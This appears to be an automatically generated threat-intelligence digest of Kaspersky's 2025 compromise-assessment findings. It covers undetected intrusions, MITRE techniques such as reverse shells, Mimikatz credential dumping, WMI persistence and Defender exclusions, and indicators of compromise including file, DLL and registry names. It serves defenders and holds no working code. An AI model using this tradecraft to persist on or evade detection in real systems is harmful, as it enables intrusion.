Kaspersky’s 2025 compromise assessments show that many serious intrusions went undetected for months or even years, with the oldest missed incident dating back four years. The report highlights recurring abuse of web shells, LoLBins, remote management tools, and named campaigns and actors such as NSABuffMiner, PurpleFox, LionTail, Scarred Manticore, Impacket, Cobalt Strike, Mimikatz, and ClipBanker. #NSABuffMiner #PurpleFox #LionTail #ScarredManticore #Impacket #CobaltStrike #Mimikatz #ClipBanker
Keypoints
- Proactive compromise assessments found fewer high-severity incidents than reactive, post-incident checks.
- About 20% of incidents were found manually, while 60% were missed because tools produced no high-confidence alerts.
- Many incidents were long-lived: 30.8% had activity older than three months, and the oldest was undetected for four years.
- Web shells frequently persisted in backups, accounting for 40% of discovered web shell cases.
- Remote management tools and LoLBins appeared in every engagement that led to incident detection.
- Weak monitoring, poor alert validation, and communication gaps were major reasons threats remained hidden.
- Detected activity spanned multiple campaigns and tools, including NSABuffMiner, PurpleFox, LionTail, Impacket, Cobalt Strike, and Mimikatz.
MITRE Techniques
- [T1053.003 ] Scheduled Task/Job: Cron – Used to restore a web shell and to launch propagation/mining scripts on Linux systems (‘a cron job that automated fetched a copy of a PHP web shell’ / ‘creating scheduled tasks to execute the propagation and infection scripts’).
- [T1547.001 ] Registry Run Keys / Startup Folder – Used by ClipBanker to persist via the Windows Run key (‘maintaining persistence by adding itself to the registry key …CurrentVersionRun9Er6IIp’).
- [T1546.003 ] Windows Management Instrumentation Event Subscription – Used to download and execute PowerShell through a malicious WMI event consumer (‘a malicious WMI event consumer was detected that downloads and executes a PowerShell script’).
- [T1059.004 ] Unix Shell – A bash reverse shell was used to create an interactive command channel (‘the process list showed a bash reverse shell’).
- [T1059.001 ] PowerShell – Used to download payloads and execute code during compromise activity (‘downloads and executes a PowerShell script’ / ‘executed a PowerShell command that downloaded an executable’).
- [T1021.004 ] Remote Services: SSH – Not explicitly SSH; no direct evidence. (Not included.)
- [T1027 ] Obfuscated Files or Information – Hidden file locations and spoofed names were used to conceal artifacts (‘only font files in this directory are visible’ / ‘a spoofed svchost.exe’).
- [T1562.001 ] Impair Defenses – Windows Defender exclusions were added to hide malware (‘adding the malware’s folder to Windows Defender exclusions’).
- [T1112 ] Modify Registry – Registry-based persistence was established and modified (‘adding itself to the registry key …Run’).
- [T1105 ] Ingress Tool Transfer – Payloads were downloaded from GitHub and command-and-control infrastructure (‘downloads and executes a PowerShell script’ / ‘fetched a copy … from a public GitHub repository’).
- [T1047 ] Windows Management Instrumentation – WMI was used for execution and persistence (‘a malicious WMI event consumer’).
- [T1003 ] OS Credential Dumping – Mimikatz and credential theft were observed (‘the presence of a Mimikatz binary and a memory dump … confirming that a credential theft operation had indeed taken place’).
- [T1021.002 ] Remote Services: SMB/Windows Admin Shares – Lateral movement and propagation used SMB and PsExec-like administration (‘spreads via the SMB protocol’ / ‘used PsExec to execute a .cmd script across all the servers’).
- [T1041 ] Exfiltration Over C2 Channel – Scarred Manticore masked exfiltration within normal-looking traffic (‘performs data exfiltration while carefully masking command-and-control communications’).
- [T1071.001 ] Web Protocols – LionTail delivered and retrieved payloads over inbound HTTP traffic (‘covertly deliver and retrieve payloads via inbound HTTP traffic’).
- [T1055 ] Process Injection – Multiple payloads were injected into processes like lsass.exe and explorer.exe (‘inject the malicious DLLs … into lsass.exe and explorer.exe’).
- [T1218 ] System Binary Proxy Execution – LoLBins such as certutil, bitsadmin, regsvr32, and wmic were abused for malicious activity (‘binaries that are part of the operating system … often repurposed for lateral movement, data exfiltration, and persistence’).
- [T1021.001 ] Remote Services: Remote Desktop Protocol – Remote management tools such as VNC/AnyDesk/TeamViewer supported lateral movement-like activity (‘observed remote management utilities span both proprietary platforms, such as TeamViewer and AnyDesk, and … VNC servers’).
- [T1566 ] Phishing – Not mentioned in the article. (Not included.)
Indicators of Compromise
- [File names ] Hidden or malicious files used for persistence/mining on domain controllers – nei.bat, dl1host.exe, svchost.exe, and other names like bat.bat, cmd.bat.
- [Paths ] Locations used to hide web shells and malicious files – C:WindowsFontsMysql, D:backup[redacted_for_privacy].rar/wwwroot//[redacted_for_privacy].aspx.
- [Registry keys ] Persistence and startup-related registry locations – HKUS-1-5-21-[REDACTED]-500SoftwareMicrosoftWindowsCurrentVersionRun9Er6IIp, HKLMSoftwareMicrosoftWindowsCurrentVersionUninstall.
- [Filenames/scripts ] Scripts used in lateral movement and propagation – poab.bat, load.bat, loab.bat, and .cmd scripts.
- [Malware/tool names ] Detected malicious tools and families – NSABuffMiner, PurpleFox, LionTail, Cobalt Strike, Mimikatz, ClipBanker.
- [DLL names ] Injected or malicious DLLs referenced in the activity – Eternalblue2.dll, Doublepulsar2.dll.
- [Service/task names ] Persistence objects created for mining and execution – MicrosoftMysql, MicrosoftFonts, MicrosoftMSSql, At1, At2.
- [User/account names ] Accounts involved in suspicious execution – apache, local administrator account.
- [Network indicators ] Network details associated with scanning and compromise – SMB port 445, NetBIOS port 139, public GitHub repository, command-and-control server.
- [Windows objects ] System artifacts observed during investigation – scrcons.exe, lsass.exe, explorer.exe, taskhost.exe.
- [Directories/paths ] File system locations tied to malicious activity or concealment – %TEMP%, user Downloads folder, /Users/[REDACTED]/.claude/shell-snapshots/.
Read more: https://securelist.com/compromise-assessment-findings-2025/120542/